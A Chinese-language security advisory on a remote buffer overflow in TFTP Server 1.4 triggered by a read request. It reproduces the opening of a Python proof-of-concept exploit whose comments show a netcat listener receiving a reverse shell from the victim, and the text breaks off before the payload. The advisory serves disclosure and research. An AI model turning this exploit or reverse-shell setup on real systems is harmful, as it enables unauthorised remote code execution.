TFTP Server读请求远程缓冲区溢出漏洞

发布日期：2012-01-11
更新日期：2012-05-16

受影响系统：
sourceforge tftp-server 1.4
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 51364

TFTP Server是用于PXEBOOT的免费多线程TFTP服务器。

TFTP Server 1.4在实现上存在缓冲区溢出漏洞，攻击者可利用此漏洞在受影响应用中执行任意代码。

<*来源：b33f
  *>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

b33f （）提供了如下测试方法：

#!/usr/bin/python

#---------------------------------------------------------------------------#
# Exploit: TFTP SERVER V1.4 ST (RRQ Overflow)                               #
# OS: Windows XP PRO SP3                                                    #
# Author: b33f                                                              #
#---------------------------------------------------------------------------#
# Smashing the stack for fun and practise...                                #
#                                                                           #
# This tftp service have been pwned extensively:                            #
# (1) Muts ==> WRQ Overflow                                                 #
#                                   #
# (2) Molotov ==> WRQ Overflow                                              #
#                                  #
# (3) tixxDZ ==> ERROR Overflow                                             #
#                                   #
#                                                                           #
# Vulnerable software:                                                      #
#                                #
#---------------------------------------------------------------------------#
# After some simple fuzzing with spike I discovered that sending a Read     #
# Request (RRQ) packet can also trigger a buffer overflow...                #
#---------------------------------------------------------------------------#
# It might take up to 30 seconds for some reason but the shell does appear  #
# as expected....                                                           #
#                                                                           #
# root@bt:~# nc -lvp 9988                                                   #
# listening on [any] 9988 ...                                               #
# 192.168.111.128: inverse host lookup failed: Unknown server error         #
# connect to [192.168.111.132] from (UNKNOWN) [192.168.111.128] 1072        #
# Microsoft Windows XP [Version 5.1.2600]                                   #
# (C) Copyright 1985-2001 Microsoft Corp.                                   #
#                                                                           #
# C:\Program Files\TFTPServer>                                              #
#---------------------------------------------------------------------------#

import socket
import sys

host = '192.168.111.128'
port = 69